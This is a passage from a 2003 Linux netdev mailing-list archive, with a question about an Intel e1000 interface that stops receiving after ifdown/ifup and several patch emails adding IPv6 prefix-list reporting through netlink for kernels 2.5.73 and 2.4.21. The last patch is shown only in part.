-0400 Jeff Garzik wrote: > There ARE definitions that differ between kernel and userspace. Sure, but none of the one's were talking about here. > Thinking they are the same is not founded in reality. I'm not. > And thinking that all of userspace is instantly recompiled against > against the latest kernel headers isn't founded in reality, either. GLIBC is munging netlink messages on the way out via sendmsg()? That'd be news to me. :-) From mdharm@ziggy.one-eyed-alien.net Wed Jul 16 09:37:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 09:38:24 -0700 (PDT) Received: from ziggy.one-eyed-alien.net (IDENT:root@ziggy.one-eyed-alien.net [64.169.228.100]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GGbPFl024209 for ; Wed, 16 Jul 2003 09:37:48 -0700 Received: (from mdharm@localhost) by ziggy.one-eyed-alien.net (8.11.6/8.11.6) id h6GGRd517790 for netdev@oss.sgi.com; Wed, 16 Jul 2003 09:27:39 -0700 Date: Wed, 16 Jul 2003 09:27:39 -0700 From: Matthew Dharm To: netdev@oss.sgi.com Subject: e1000 with 82546EB parts on 2.4? Message-ID: <20030716092739.C17580@one-eyed-alien.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="jy6Sn24JjFx/iggw" Content-Disposition: inline User-Agent: Mutt/1.2.5i Organization: One Eyed Alien Networks X-Copyright: (C) 2003 Matthew Dharm, all rights reserved. X-Message-Flag: Get a real e-mail client. http://www.mutt.org/ X-archive-position: 4109 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mdharm-kernel@one-eyed-alien.net Precedence: bulk X-list: netdev --jy6Sn24JjFx/iggw Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable I'm working with some hardware that may or may not be completely reliable, and trying to figure out if something I'm seeing is a 'known issue' or something strange about my setup (which is entirely possible). I'm using 2.4.20 with some custom hardware. What I've got is your basic x86 machine with an Intel 82546EB dual-GigE controller on a PCI bus. I load e1000.o, ifconfig, and I'm running. The interface is solid as a rock, AFAICT. I've left it running for days without any problems. However, if I ifdown and then ifup the interface, I'm borked. Based on tcpdump from another machine, the interface is definately transmitting packets just fine. But, it never seems to notice any packets on the receive side. Has anyone seen anything like this before? Matt --=20 Matthew Dharm Home: mdharm-usb@one-eyed-alien.= net=20 Maintainer, Linux USB Mass Storage Driver A: The most ironic oxymoron wins ... DP: "Microsoft Works" A: Uh, okay, you win. -- A.J. & Dust Puppy User Friendly, 1/18/1998 --jy6Sn24JjFx/iggw Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD4DBQE/FXz7IjReC7bSPZARAm3QAJ9FXGauZb+6KBBODke+zBhA/GFf+QCYv+Mh J95mPS67nP0emQlE47bxVg== =FxNQ -----END PGP SIGNATURE----- --jy6Sn24JjFx/iggw-- From krkumar@us.ibm.com Wed Jul 16 11:44:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 11:45:11 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GIiqFl027081 for ; Wed, 16 Jul 2003 11:44:59 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6GIhxc8225008; Wed, 16 Jul 2003 14:43:59 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6GIhqMc130282; Wed, 16 Jul 2003 12:43:52 -0600 Date: Wed, 16 Jul 2003 11:42:33 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: kuznet@ms2.inr.ac.ru, , , Subject: [PATCH 1/2] Prefix List against 2.5.73 In-Reply-To: <20030716.173926.81875946.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4110 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev Hi, > > Select yourself: either IFA_IFFLAGS or translated flags in ifa_flags. > > I prefer the second way just because it is too unpleasant to add > > a new attribute for sake of two bits with no visible candidates > > to use remaining ones. > > Well, I dislike ifa_flags because > - it is conceptually wrong to combine them. > e.g. even if all autoconf addresses expired, flags lasts and > we should report it to userspace. > - ifa_flags is extremely expensive resource. > There are only 8 bits. Use it only for addresses. Well, I tend to agree with Alexey since we don't need a lot of extra data support for providing 2 bits. The advantage with this approach is that the unmodified ip util can display the flags correctly after it removes the address specific flags. Going by the other approach, we need to support a new type to get this information (IFA_IFFLAGS). If number of bits is considered important, then it is possible to just return the 6 bits (ignore the RS* bits). I feel this is less complicated of the two ways. So at this time, I am sending the patch for 2.5.73 (is this too old ?) using Alexey's suggestion. Patch follows for 2.4.21. Thanks, - KK diff -ruN linux-2.5.73.org/include/linux/ipv6_route.h test/linux-2.5.73/include/linux/ipv6_route.h --- linux-2.5.73.org/include/linux/ipv6_route.h 2003-06-22 11:32:36.000000000 -0700 +++ test/linux-2.5.73/include/linux/ipv6_route.h 2003-07-15 10:38:31.000000000 -0700 @@ -16,6 +16,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 @@ -44,4 +45,16 @@ #define RTMSG_NEWROUTE 0x21 #define RTMSG_DELROUTE 0x22 +/* + * Return entire prefix list in array of following structures. Provides the + * prefix and prefix length for all devices. + */ + +struct in6_prefix_msg +{ + int ifindex; + int prefix_len; + struct in6_addr prefix; +}; + #endif diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-16 10:58:19.000000000 -0700 @@ -168,6 +168,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.5.73.org/include/net/if_inet6.h test/linux-2.5.73/include/net/if_inet6.h --- linux-2.5.73.org/include/net/if_inet6.h 2003-06-22 11:33:32.000000000 -0700 +++ test/linux-2.5.73/include/net/if_inet6.h 2003-07-16 09:55:25.000000000 -0700 @@ -17,7 +17,9 @@ #include -#define IF_RA_RCVD 0x20 +#define IF_RA_OTHERCONF 0x02 +#define IF_RA_MANAGED 0x04 +#define IF_RA_RCVD 0x08 #define IF_RS_SENT 0x10 #ifdef __KERNEL__ diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-16 11:01:10.000000000 -0700 @@ -129,7 +129,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -715,7 +715,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1211,7 +1211,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1238,7 +1238,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1330,7 +1330,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1378,7 +1379,7 @@ } create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1529,7 +1530,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1704,7 +1705,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1943,8 +1944,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1958,7 +1958,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1968,7 +1968,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -2368,7 +2368,7 @@ ifm = NLMSG_DATA(nlh); ifm->ifa_family = AF_INET6; ifm->ifa_prefixlen = ifa->prefix_len; - ifm->ifa_flags = ifa->flags; + ifm->ifa_flags = ifa->flags | ifa->idev->if_flags; ifm->ifa_scope = RT_SCOPE_UNIVERSE; if (ifa->scope&IFA_HOST) ifm->ifa_scope = RT_SCOPE_HOST; diff -ruN linux-2.5.73.org/net/ipv6/ndisc.c test/linux-2.5.73/net/ipv6/ndisc.c --- linux-2.5.73.org/net/ipv6/ndisc.c 2003-06-22 11:32:56.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/ndisc.c 2003-07-14 15:06:14.000000000 -0700 @@ -1036,6 +1036,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); diff -ruN linux-2.5.73.org/net/ipv6/route.c test/linux-2.5.73/net/ipv6/route.c --- linux-2.5.73.org/net/ipv6/route.c 2003-06-22 11:33:05.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/route.c 2003-07-16 10:42:01.000000000 -0700 @@ -1400,13 +1400,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1487,10 +1494,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1638,7 +1651,7 @@ &fl.fl6_dst, &fl.fl6_src, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1664,7 +1677,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From krkumar@us.ibm.com Wed Jul 16 11:51:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 11:51:36 -0700 (PDT) Received: from e33.co.us.ibm.com (e33.co.us.ibm.com [32.97.110.131]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GIpNFl027506 for ; Wed, 16 Jul 2003 11:51:24 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e33.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6GIobj3222472; Wed, 16 Jul 2003 14:50:37 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6GIoUMc222188; Wed, 16 Jul 2003 12:50:30 -0600 Date: Wed, 16 Jul 2003 11:49:11 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: kuznet@ms2.inr.ac.ru, , , Subject: Re: [PATCH 1/2] Prefix List against 2.5.73 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4111 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev Sorry, I had an extra structure in the previous patch which is not needed after taking alexey's changes. Now since the prefix list and the routing table are returned *identically*, the extra structure in6_prefix_mgs is removed. This is the correct patch for 2.5.73. Thanks, - KK diff -ruN linux-2.5.73.org/include/linux/ipv6_route.h test/linux-2.5.73/include/linux/ipv6_route.h --- linux-2.5.73.org/include/linux/ipv6_route.h 2003-06-22 11:32:36.000000000 -0700 +++ test/linux-2.5.73/include/linux/ipv6_route.h 2003-07-15 10:38:31.000000000 -0700 @@ -16,6 +16,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-16 10:58:19.000000000 -0700 @@ -168,6 +168,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.5.73.org/include/net/if_inet6.h test/linux-2.5.73/include/net/if_inet6.h --- linux-2.5.73.org/include/net/if_inet6.h 2003-06-22 11:33:32.000000000 -0700 +++ test/linux-2.5.73/include/net/if_inet6.h 2003-07-16 09:55:25.000000000 -0700 @@ -17,7 +17,9 @@ #include -#define IF_RA_RCVD 0x20 +#define IF_RA_OTHERCONF 0x02 +#define IF_RA_MANAGED 0x04 +#define IF_RA_RCVD 0x08 #define IF_RS_SENT 0x10 #ifdef __KERNEL__ diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-16 11:01:10.000000000 -0700 @@ -129,7 +129,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -715,7 +715,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1211,7 +1211,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1238,7 +1238,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1330,7 +1330,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1378,7 +1379,7 @@ } create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1529,7 +1530,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1704,7 +1705,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1943,8 +1944,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1958,7 +1958,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1968,7 +1968,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -2368,7 +2368,7 @@ ifm = NLMSG_DATA(nlh); ifm->ifa_family = AF_INET6; ifm->ifa_prefixlen = ifa->prefix_len; - ifm->ifa_flags = ifa->flags; + ifm->ifa_flags = ifa->flags | ifa->idev->if_flags; ifm->ifa_scope = RT_SCOPE_UNIVERSE; if (ifa->scope&IFA_HOST) ifm->ifa_scope = RT_SCOPE_HOST; diff -ruN linux-2.5.73.org/net/ipv6/ndisc.c test/linux-2.5.73/net/ipv6/ndisc.c --- linux-2.5.73.org/net/ipv6/ndisc.c 2003-06-22 11:32:56.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/ndisc.c 2003-07-14 15:06:14.000000000 -0700 @@ -1036,6 +1036,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); diff -ruN linux-2.5.73.org/net/ipv6/route.c test/linux-2.5.73/net/ipv6/route.c --- linux-2.5.73.org/net/ipv6/route.c 2003-06-22 11:33:05.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/route.c 2003-07-16 10:42:01.000000000 -0700 @@ -1400,13 +1400,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1487,10 +1494,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1638,7 +1651,7 @@ &fl.fl6_dst, &fl.fl6_src, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1664,7 +1677,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From krkumar@us.ibm.com Wed Jul 16 11:52:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 11:52:47 -0700 (PDT) Received: from e5.ny.us.ibm.com (e5.ny.us.ibm.com [32.97.182.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GIqdFl027824 for ; Wed, 16 Jul 2003 11:52:40 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e5.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6GIps4X197346; Wed, 16 Jul 2003 14:51:54 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6GIppq6129134; Wed, 16 Jul 2003 14:51:52 -0400 Date: Wed, 16 Jul 2003 11:50:26 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: kuznet@ms2.inr.ac.ru, , , Subject: [PATCH 2/2] Prefix List against 2.4.21 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4112 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev This is the same patch against 2.4.21 Thanks, - KK diff -ruN linux-2.4.21.org/include/linux/ipv6_route.h test/linux.2.4.21/include/linux/ipv6_route.h --- linux-2.4.21.org/include/linux/ipv6_route.h 1998-08-27 19:33:08.000000000 -0700 +++ test/linux.2.4.21/include/linux/ipv6_route.h 2003-07-16 10:58:57.000000000 -0700 @@ -25,6 +25,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.4.21.org/include/linux/rtnetlink.h test/linux.2.4.21/include/linux/rtnetlink.h --- linux-2.4.21.org/include/linux/rtnetlink.h 2002-11-28 15:53:15.000000000 -0800 +++ test/linux.2.4.21/include/linux/rtnetlink.h 2003-07-16 10:57:58.000000000 -0700 @@ -167,6 +167,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ @@ -198,7 +199,7 @@ RTA_MULTIPATH, RTA_PROTOINFO, RTA_FLOW, - RTA_CACHEINFO + RTA_CACHEINFO, }; #define RTA_MAX RTA_CACHEINFO diff -ruN linux-2.4.21.org/include/net/if_inet6.h test/linux.2.4.21/include/net/if_inet6.h --- linux-2.4.21.org/include/net/if_inet6.h 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/include/net/if_inet6.h 2003-07-16 10:54:53.000000000 -0700 @@ -15,7 +15,9 @@ #ifndef _NET_IF_INET6_H #define _NET_IF_INET6_H -#define IF_RA_RCVD 0x20 +#define IF_RA_OTHERCONF 0x02 +#define IF_RA_MANAGED 0x04 +#define IF_RA_RCVD 0x08 #define IF_RS_SENT 0x10 #ifdef __KERNEL__ diff -ruN linux-2.4.21.org/net/ipv6/addrconf.c test/linux.2.4.21/net/ipv6/addrconf.c --- linux-2.4.21.org/net/ipv6/addrconf.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/addrconf.c 2003-07-16 11:05:15.000000000 -0700 @@ -101,7 +101,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -889,7 +889,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; 